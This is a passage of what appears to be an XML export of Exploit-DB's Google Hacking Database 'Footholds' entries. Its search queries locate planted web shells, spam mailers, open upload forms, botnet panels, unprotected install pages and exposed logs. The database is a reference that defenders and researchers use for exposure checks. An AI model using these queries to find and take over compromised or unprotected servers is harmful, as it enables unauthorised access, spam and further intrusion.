ext:php intext:&quot;-rwxr-xr-x&quot; site:.in
Armhacker666</textualDescription>
<query>ext:php intext:&quot;-rwxr-xr-x&quot; site:.in</query>
<querystring>https://www.google.com/search?q=ext:php intext:&quot;-rwxr-xr-x&quot; site:.in</querystring>
<edb></edb>
<date>2017-05-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4171</id>
<link>https://www.exploit-db.com/ghdb/4171</link>
<category>Footholds</category>
<shortDescription>ext:php intitle:&quot;b374k&quot;</shortDescription>
<textualDescription>ext:php intitle:&quot;b374k&quot;
details; http://atawho.blogspot.com.tr/2015/12/b374k-shell-tespiti.html
atawho-sonadam-hackunity</textualDescription>
<query>ext:php intitle:&quot;b374k&quot;</query>
<querystring>https://www.google.com/search?q=ext:php intitle:&quot;b374k&quot;</querystring>
<edb></edb>
<date>2016-01-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>710</id>
<link>https://www.exploit-db.com/ghdb/710</link>
<category>Footholds</category>
<shortDescription>filetype:php HAXPLORER &quot;Server Files Browser&quot;</shortDescription>
<textualDescription>Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files. As the script's name says it is mostly installed by hackers</textualDescription>
<query>filetype:php HAXPLORER &quot;Server Files Browser&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=filetype%3Aphp+HAXPLORER+%22Server+Files+Browser%22</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3918</id>
<link>https://www.exploit-db.com/ghdb/3918</link>
<category>Footholds</category>
<shortDescription>filetype:php intext:&quot;!C99Shell v. 1.0 beta&quot;</shortDescription>
<textualDescription>php backdoor: c99 shell
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>filetype:php intext:&quot;!C99Shell v. 1.0 beta&quot;</query>
<querystring>https://www.google.com/search?q=filetype:php intext:&quot;!C99Shell v. 1.0 beta&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4328</id>
<link>https://www.exploit-db.com/ghdb/4328</link>
<category>Footholds</category>
<shortDescription>filetype:php intext:Your Email: intext:Your Name: intext:Reply-To: intext:mailer</shortDescription>
<textualDescription>This dork results in PHP mailers already uploaded and ready for use ! ;)
Google Dork :
filetype:php intext:&quot;Your Email:&quot; intext:&quot;Your Name:&quot; intext:&quot;Reply-To:&quot; intext:mailer
Best Regards.
XSLASH</textualDescription>
<query>filetype:php intext:Your Email: intext:Your Name: intext:Reply-To: intext:mailer</query>
<querystring>https://www.google.com/search?q=filetype:php intext:Your Email: intext:Your Name: intext:Reply-To: intext:mailer</querystring>
<edb></edb>
<date>2016-09-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4941</id>
<link>https://www.exploit-db.com/ghdb/4941</link>
<category>Footholds</category>
<shortDescription>intext:&quot;M3R1C4 SHELL BACKDOOR&quot;</shortDescription>
<textualDescription>intext:&quot;M3R1C4 SHELL BACKDOOR&quot;
foothold web shell
ManhNho
</textualDescription>
<query>intext:&quot;M3R1C4 SHELL BACKDOOR&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;M3R1C4 SHELL BACKDOOR&quot;</querystring>
<edb></edb>
<date>2018-09-10</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4146</id>
<link>https://www.exploit-db.com/ghdb/4146</link>
<category>Footholds</category>
<shortDescription>intext:&quot;Please select file to upload:&quot; ext:php</shortDescription>
<textualDescription>Various file upload forms - potential footholds?
Decoy</textualDescription>
<query>intext:&quot;Please select file to upload:&quot; ext:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please select file to upload:&quot; ext:php</querystring>
<edb></edb>
<date>2015-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4174</id>
<link>https://www.exploit-db.com/ghdb/4174</link>
<category>Footholds</category>
<shortDescription>intext:&quot;Sw Bilgi&quot; ext:php</shortDescription>
<textualDescription>Upload Shell Dork
intext:&quot;Sw Bilgi&quot; ext:php
details:
http://atawho.blogspot.com.tr/2015/11/shell-dork-031115.html
atawho-sonadam-hackunity</textualDescription>
<query>intext:&quot;Sw Bilgi&quot; ext:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;Sw Bilgi&quot; ext:php</querystring>
<edb></edb>
<date>2016-01-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4145</id>
<link>https://www.exploit-db.com/ghdb/4145</link>
<category>Footholds</category>
<shortDescription>intext:&quot;Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5&quot;</shortDescription>
<textualDescription>BLaSTER Webshell Footholds.
Decoy</textualDescription>
<query>intext:&quot;Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5&quot;</querystring>
<edb></edb>
<date>2015-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4175</id>
<link>https://www.exploit-db.com/ghdb/4175</link>
<category>Footholds</category>
<shortDescription>intext:Developed By Black.Hack3r ext:php</shortDescription>
<textualDescription>Upload Shell Dorks
intext:Developed By Black.Hack3r ext:php
intitle:.:: Private Uploder By Black.Hack3r ::. ext:php
detail:</textualDescription>
<query>intext:Developed By Black.Hack3r ext:php</query>
<querystring>https://www.google.com/search?q=intext:Developed By Black.Hack3r ext:php</querystring>
<edb></edb>
<date>2016-01-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4202</id>
<link>https://www.exploit-db.com/ghdb/4202</link>
<category>Footholds</category>
<shortDescription>intitle: &quot;phpshell&quot; &quot;Php Safe-Mode Bypass&quot;</shortDescription>
<textualDescription>intitle: &quot;phpshell&quot; &quot;Php Safe-Mode Bypass&quot;</textualDescription>
<query>intitle: &quot;phpshell&quot; &quot;Php Safe-Mode Bypass&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;phpshell&quot; &quot;Php Safe-Mode Bypass&quot;</querystring>
<edb></edb>
<date>2016-02-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5793</id>
<link>https://www.exploit-db.com/ghdb/5793</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;(SSI Web Shell)&quot; AND intext:&quot;(ls -al)&quot;</shortDescription>
<textualDescription># Dork #
intitle:&quot;(SSI Web Shell)&quot; AND intext:&quot;(ls -al)&quot;
Footholds for SSI Web Shell.
</textualDescription>
<query>intitle:&quot;(SSI Web Shell)&quot; AND intext:&quot;(ls -al)&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;(SSI Web Shell)&quot; AND intext:&quot;(ls -al)&quot;</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>3926</id>
<link>https://www.exploit-db.com/ghdb/3926</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;=[ 1n73ct10n privat shell ]=&quot;</shortDescription>
<textualDescription>the dork is used to find uploaded 1n73ct10n Shell on website.
found by Anon?M ID</textualDescription>
<query>intitle:&quot;=[ 1n73ct10n privat shell ]=&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;=[ 1n73ct10n privat shell ]=&quot;</querystring>
<edb></edb>
<date>2014-01-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4506</id>
<link>https://www.exploit-db.com/ghdb/4506</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Authorization&quot; &quot;TF&quot; inurl:&quot;admin.php&quot;</shortDescription>
<textualDescription>Finds a bunch of unprotected botnet control panels
Dxtroyer</textualDescription>
<query>intitle:&quot;Authorization&quot; &quot;TF&quot; inurl:&quot;admin.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Authorization&quot; &quot;TF&quot; inurl:&quot;admin.php&quot;</querystring>
<edb></edb>
<date>2017-05-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>959</id>
<link>https://www.exploit-db.com/ghdb/959</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;ERROR: The requested URL could not be retrieved&quot; &quot;While trying to retrieve the URL&quot; &quot;The following error was encountered:&quot;</shortDescription>
<textualDescription>squid error messages, most likely from reverse proxy servers.</textualDescription>
<query>intitle:&quot;ERROR: The requested URL could not be retrieved&quot; &quot;While trying to retrieve the URL&quot; &quot;The following error was encountered:&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22ERROR%3A+The+requested+URL+could+not+be+retrieved%22+%22While+trying+to+retrieve+the+URL%22+%22The+following+error+was+encountered%22</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5081</id>
<link>https://www.exploit-db.com/ghdb/5081</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;FCKeditor - Connectors Tests&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;FCKeditor - Connectors Tests&quot;
Unauthenticated file upload and directory list
Burov Konstantin
</textualDescription>
<query>intitle:&quot;FCKeditor - Connectors Tests&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;FCKeditor - Connectors Tests&quot;</querystring>
<edb></edb>
<date>2019-01-18</date>
<author>Burov Konstantin</author>
</entry>
<entry>
<id>5080</id>
<link>https://www.exploit-db.com/ghdb/5080</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;FCKeditor - Uploaders Tests&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;FCKeditor - Uploaders Tests&quot;
Unauthenticated file upload
Burov Konstantin
</textualDescription>
<query>intitle:&quot;FCKeditor - Uploaders Tests&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;FCKeditor - Uploaders Tests&quot;</querystring>
<edb></edb>
<date>2019-01-18</date>
<author>Burov Konstantin</author>
</entry>
<entry>
<id>5652</id>
<link>https://www.exploit-db.com/ghdb/5652</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;freedom is real - 1945&quot;</shortDescription>
<textualDescription>Dork:
intitle:&quot;freedom is real - 1945&quot;
Category: Vulnerable servers
Author: Jakob Denlinger
Info:
Common webshell that sets the HTML title tag to '.[ freedom is real - 1945
].'
</textualDescription>
<query>intitle:&quot;freedom is real - 1945&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;freedom is real - 1945&quot;</querystring>
<edb></edb>
<date>2019-11-20</date>
<author>Jakob Denlinger</author>
</entry>
<entry>
<id>4292</id>
<link>https://www.exploit-db.com/ghdb/4292</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Hamdida X_Shell Backd00r&quot;</shortDescription>
<textualDescription>Interesting little backdoor.
intitle:&quot;Hamdida X_Shell Backd00r&quot;
Decoy</textualDescription>
<query>intitle:&quot;Hamdida X_Shell Backd00r&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Hamdida X_Shell Backd00r&quot;</querystring>
<edb></edb>
<date>2016-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>6384</id>
<link>https://www.exploit-db.com/ghdb/6384</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Index of /&quot; +.htaccess</shortDescription>
<textualDescription>Dork:intitle:&quot;Index of /&quot; +.htaccess
Description: Access to the parent directory and more...
Author: Priyanka Prasad
</textualDescription>
<query>intitle:&quot;Index of /&quot; +.htaccess</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; +.htaccess</querystring>
<edb></edb>
<date>2020-07-08</date>
<author>Priyanka Prasad</author>
</entry>
<entry>
<id>6387</id>
<link>https://www.exploit-db.com/ghdb/6387</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;index of /&quot; +.htdocs</shortDescription>
<textualDescription>Description: intitle:&quot;index of /&quot; +.htdocs
Access to the parent directory and get lots of information of directory
and contains with sensitive information.This kind of foothold.
Linkedin : https://www.linkedin.com/in/peaceonmind/
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>intitle:&quot;index of /&quot; +.htdocs</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; +.htdocs</querystring>
<edb></edb>
<date>2020-07-09</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>6299</id>
<link>https://www.exploit-db.com/ghdb/6299</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin/xml&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of&quot; &quot;admin/xml&quot;
Exploit Author: Viraj Mota
Description: This Google dork lists out sensitive XML file stored in the
admin folder for a website.
Best regards,
Viraj Mota
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin/xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin/xml&quot;</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Viraj Mota</author>
</entry>
<entry>
<id>6532</id>
<link>https://www.exploit-db.com/ghdb/6532</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;index of&quot; &quot;httpd.pid&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;httpd.pid&quot;
*Regards,*
*Navaneeth Shyam*
*Security Researcher*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;httpd.pid&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;httpd.pid&quot;</querystring>
<edb></edb>
<date>2020-09-11</date>
<author>Navaneeth Shyam</author>
</entry>
<entry>
<id>6364</id>
<link>https://www.exploit-db.com/ghdb/6364</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;index of&quot; &quot;nginx.log&quot;</shortDescription>
<textualDescription>Description : intitle:&quot;index of&quot; &quot;nginx.log&quot;
This google dork gives us the Nginx logs and sensitive details of
misconfigured servers.
Regards,
Emmanuel Karunya
+919743055278
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;nginx.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;nginx.log&quot;</querystring>
<edb></edb>
<date>2020-07-02</date>
<author>Emmanuel Karunya</author>
</entry>
<entry>
<id>6321</id>
<link>https://www.exploit-db.com/ghdb/6321</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;index of&quot; and intext:&quot;vendor&quot; and intext:&quot;phpunit&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;index of&quot; and intext:&quot;vendor&quot; and intext:&quot;phpunit&quot;
# Author: Arpit Kubadia
# This dork searches both for directory listings,
# as well as a well-known PHP file called PHPUnit that is often vulnerable to
# remote code execution.
# Attaching below the same dork in attachment
# Regards.
</textualDescription>
<query>intitle:&quot;index of&quot; and intext:&quot;vendor&quot; and intext:&quot;phpunit&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; and intext:&quot;vendor&quot; and intext:&quot;phpunit&quot;</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Arpit Kubadia</author>
</entry>
<entry>
<id>6430</id>
<link>https://www.exploit-db.com/ghdb/6430</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;index.of&quot; +jmx-console</shortDescription>
<textualDescription>Description: intitle:&quot;index.of&quot; +jmx-console
This google dorks give us java management extention.
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>intitle:&quot;index.of&quot; +jmx-console</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; +jmx-console</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>5090</id>
<link>https://www.exploit-db.com/ghdb/5090</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;InfluxDB - Admin Interface&quot; -github</shortDescription>
<textualDescription>Dork about InfluxDB without password
InfluxDB - Open Source Time Series DB Platform for Metrics &amp; Events (Time Series Data)
intitle:&quot;InfluxDB - Admin Interface&quot; -github
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:&quot;InfluxDB - Admin Interface&quot; -github</query>
<querystring>https://www.google.com/search?q=intitle:&quot;InfluxDB - Admin Interface&quot; -github</querystring>
<edb></edb>
<date>2019-02-05</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>4751</id>
<link>https://www.exploit-db.com/ghdb/4751</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Installing TYPO3 CMS&quot;</shortDescription>
<textualDescription> This will find the First Install Wizard of the TYPO3 CMS.
This is NOT the same as this dork: https://www.exploit-db.com/ghdb/3942/
which lets you find the Install tool, which is available after the
Installation itself.
My dork will rather find the First Install wizard, which opposed to the
Install tool does not have a password protection.
Some Installations should be able to be hijacked this way.
Use ethically and responsibly.
Dork by _palonE
</textualDescription>
<query>intitle:&quot;Installing TYPO3 CMS&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Installing TYPO3 CMS&quot;</querystring>
<edb></edb>
<date>2018-04-09</date>
<author>_palonE</author>
</entry>
<entry>
<id>1137</id>
<link>https://www.exploit-db.com/ghdb/1137</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;net2ftp&quot; &quot;powered by net2ftp&quot; inurl:ftp OR intext:login OR inurl:login</shortDescription>
<textualDescription>net2ftp is a web-based FTP client written in PHP. Lets explain this in detail. Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)</textualDescription>
<query>intitle:&quot;net2ftp&quot; &quot;powered by net2ftp&quot; inurl:ftp OR intext:login OR inurl:login</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22net2ftp%22+%22powered+by+net2ftp%22+inurl%3Aftp+OR+intext%3Alogin+OR+inurl%3Alogin</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4329</id>
<link>https://www.exploit-db.com/ghdb/4329</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;nstview v2.1:: nst.void.ru&quot; | intext:&quot;nsTView v2.1 :: nst.void.ru. Password: Host:&quot;</shortDescription>
<textualDescription>Anothe webshell &quot;nstview v2.1.php&quot;
-Xploit</textualDescription>
<query>intitle:&quot;nstview v2.1:: nst.void.ru&quot; | intext:&quot;nsTView v2.1 :: nst.void.ru. Password: Host:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;nstview v2.1:: nst.void.ru&quot; | intext:&quot;nsTView v2.1 :: nst.void.ru. Password: Host:&quot;</querystring>
<edb></edb>
<date>2016-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4422</id>
<link>https://www.exploit-db.com/ghdb/4422</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Priv8 Mailer Inbox 2015&quot; ext:php</shortDescription>
<textualDescription>Just another mailer :P
Please DO NOT use for spam!
Dxtroyer</textualDescription>
<query>intitle:&quot;Priv8 Mailer Inbox 2015&quot; ext:php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Priv8 Mailer Inbox 2015&quot; ext:php</querystring>
<edb></edb>
<date>2017-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4182</id>
<link>https://www.exploit-db.com/ghdb/4182</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Shell I&quot; inurl:revslider inurl:error.php inurl:cmd</shortDescription>
<textualDescription>Find shells inserted using the revslider vulnerability.
--
Stephen Haywood
Owner: ASG Consulting
averagesecurityguy.info</textualDescription>
<query>intitle:&quot;Shell I&quot; inurl:revslider inurl:error.php inurl:cmd</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Shell I&quot; inurl:revslider inurl:error.php inurl:cmd</querystring>
<edb></edb>
<date>2016-01-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4658</id>
<link>https://www.exploit-db.com/ghdb/4658</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Solr Admin&quot; &quot;Solr Query Syntax&quot;</shortDescription>
<textualDescription>Finds Apache Solr admin panels
Dxtroyer
</textualDescription>
<query>intitle:&quot;Solr Admin&quot; &quot;Solr Query Syntax&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Solr Admin&quot; &quot;Solr Query Syntax&quot;</querystring>
<edb></edb>
<date>2018-01-15</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>3912</id>
<link>https://www.exploit-db.com/ghdb/3912</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;uploader by ghost-dz&quot; ext:php</shortDescription>
<textualDescription>intitle:&quot;uploader by ghost-dz&quot; ext:php</textualDescription>
<query>intitle:&quot;uploader by ghost-dz&quot; ext:php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;uploader by ghost-dz&quot; ext:php</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>537</id>
<link>https://www.exploit-db.com/ghdb/537</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;Web Data Administrator - Login&quot;</shortDescription>
<textualDescription>The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser. Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data.</textualDescription>
<query>intitle:&quot;Web Data Administrator - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Web+Data+Administrator+-+Login%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4172</id>
<link>https://www.exploit-db.com/ghdb/4172</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;WSO &quot; ext:php intext:&quot;server ip&quot; 2015 intext:&quot; [ home ]&quot;</shortDescription>
<textualDescription>intitle:&quot;WSO &quot; ext:php intext:&quot;server ip&quot; 2015 intext:&quot; [ home ]&quot;
atawho-sonadam-hackunity</textualDescription>
<query>intitle:&quot;WSO &quot; ext:php intext:&quot;server ip&quot; 2015 intext:&quot; [ home ]&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WSO &quot; ext:php intext:&quot;server ip&quot; 2015 intext:&quot; [ home ]&quot;</querystring>
<edb></edb>
<date>2016-01-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>3927</id>
<link>https://www.exploit-db.com/ghdb/3927</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;WSO 2.4&quot; [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]</shortDescription>
<textualDescription>dork to find uploaded WSO 2.4 shell by hackers.
found by Anon?M ID</textualDescription>
<query>intitle:&quot;WSO 2.4&quot; [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WSO 2.4&quot; [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]</querystring>
<edb></edb>
<date>2014-01-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>965</id>
<link>https://www.exploit-db.com/ghdb/965</link>
<category>Footholds</category>
<shortDescription>intitle:&quot;YALA: Yet Another LDAP Administrator&quot;</shortDescription>
<textualDescription>YALA is a web-based LDAP administration GUI. The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose programThe goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server</textualDescription>
<query>intitle:&quot;YALA: Yet Another LDAP Administrator&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22YALA%3A+Yet+Another+LDAP+Administrator%22</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5807</id>
<link>https://www.exploit-db.com/ghdb/5807</link>
<category>Footholds</category>
<shortDescription>intitle:(&quot;Index of&quot;) AND intext:(&quot;c99.txt&quot; OR &quot;c100.txt&quot;)</shortDescription>
<textualDescription># Dork #
intitle:(&quot;Index of&quot;) AND intext:(&quot;c99.txt&quot; OR &quot;c100.txt&quot;)
Footholds for possible infected domain with web shell contents.
</textualDescription>
<query>intitle:(&quot;Index of&quot;) AND intext:(&quot;c99.txt&quot; OR &quot;c100.txt&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;Index of&quot;) AND intext:(&quot;c99.txt&quot; OR &quot;c100.txt&quot;)</querystring>
<edb></edb>
<date>2020-03-18</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>5806</id>
<link>https://www.exploit-db.com/ghdb/5806</link>
<category>Footholds</category>
<shortDescription>intitle:(&quot;Mini Shell&quot;) AND intext:(&quot;Upload File&quot;)</shortDescription>
<textualDescription># Dork #
intitle:(&quot;Mini Shell&quot;) AND intext:(&quot;Upload File&quot;)
Footholds for Mini Web Shell.
</textualDescription>
<query>intitle:(&quot;Mini Shell&quot;) AND intext:(&quot;Upload File&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;Mini Shell&quot;) AND intext:(&quot;Upload File&quot;)</querystring>
<edb></edb>
<date>2020-03-18</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>56</id>
<link>https://www.exploit-db.com/ghdb/56</link>
<category>Footholds</category>
<shortDescription>intitle:admin intitle:login</shortDescription>
<textualDescription>Admin Login pages. Now, the existance of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke.</textualDescription>
<query>intitle:admin intitle:login</query>
<querystring>https://www.google.com/search?q=intitle%3Aadmin+intitle%3Alogin</querystring>
<edb></edb>
<date>2003-09-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>5343</id>
<link>https://www.exploit-db.com/ghdb/5343</link>
<category>Footholds</category>
<shortDescription>intitle:Administration - Installation - MantisBT</shortDescription>
<textualDescription>Dorks for mantisBT CMS installation
Mr.XSecr3t
</textualDescription>
<query>intitle:Administration - Installation - MantisBT</query>
<querystring>https://www.google.com/search?q=intitle:Administration - Installation - MantisBT</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Mr.XSecr3t</author>
</entry>
<entry>
<id>4248</id>
<link>https://www.exploit-db.com/ghdb/4248</link>
<category>Footholds</category>
<shortDescription>intitle:Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army</shortDescription>
<textualDescription>Google dork Description : intitle:&quot;Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army&quot;
Author: youssef hesham
an exploit to find uploaded cPanel Finder/Cracker script and find cracked cpanle on it
</textualDescription>
<query>intitle:Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army</query>
<querystring>https://www.google.com/search?q=intitle:Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army</querystring>
<edb></edb>
<date>2016-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3808</id>
<link>https://www.exploit-db.com/ghdb/3808</link>
<category>Footholds</category>
<shortDescription>intitle:C0ded By web.sniper</shortDescription>
<textualDescription>User &amp; Domain || Symlink
Using this dork you can find the User and the Domains of the Server...
intitle:C0ded By web.sniper
Author: Un0wn_X</textualDescription>
<query>intitle:C0ded By web.sniper</query>
<querystring>https://www.google.com/search?q=intitle:C0ded By web.sniper</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4489</id>
<link>https://www.exploit-db.com/ghdb/4489</link>
<category>Footholds</category>
<shortDescription>intitle:index of intext:@WanaDecryptor@.exe</shortDescription>
<textualDescription>More of the Wannacry Ransonware infected Servers.
intitle:index of intext:@Please_Read_Me@.txt
-Xploit </textualDescription>
<query>intitle:index of intext:@WanaDecryptor@.exe</query>
<querystring>https://www.google.com/search?q=intitle:index of intext:@WanaDecryptor@.exe</querystring>
<edb></edb>
<date>2017-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4486</id>
<link>https://www.exploit-db.com/ghdb/4486</link>
<category>Footholds</category>
<shortDescription>intitle:index of intext:wncry</shortDescription>
<textualDescription>Dork to find servers affected by Wannacry Ransomware.
Author https://twitter.com/SadFud75</textualDescription>
<query>intitle:index of intext:wncry</query>
<querystring>https://www.google.com/search?q=intitle:index of intext:wncry</querystring>
<edb></edb>
<date>2017-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1064</id>
<link>https://www.exploit-db.com/ghdb/1064</link>
<category>Footholds</category>
<shortDescription>intitle:MyShell 1.1.0 build 20010923</shortDescription>
<textualDescription>Basicly MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on.</textualDescription>
<query>intitle:MyShell 1.1.0 build 20010923</query>
<querystring>https://www.google.com/search?q=intitle%3AMyShell+1.1.0+build+20010923</querystring>
<edb></edb>
<date>2005-08-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3807</id>
<link>https://www.exploit-db.com/ghdb/3807</link>
<category>Footholds</category>
<shortDescription>intitle:Priv8 SCR</shortDescription>
<textualDescription>I am Un0wn_X
Symlink User configs
intitle:Priv8 SCR
</textualDescription>
<query>Re: intitle:Priv8 SCR</query>
<querystring>https://www.google.com/search?q=intitle:Priv8 SCR</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4054</id>
<link>https://www.exploit-db.com/ghdb/4054</link>
<category>Footholds</category>
<shortDescription>intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED</shortDescription>
<textualDescription>Google Dork that brings up ddos shell</textualDescription>
<query>intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED</query>
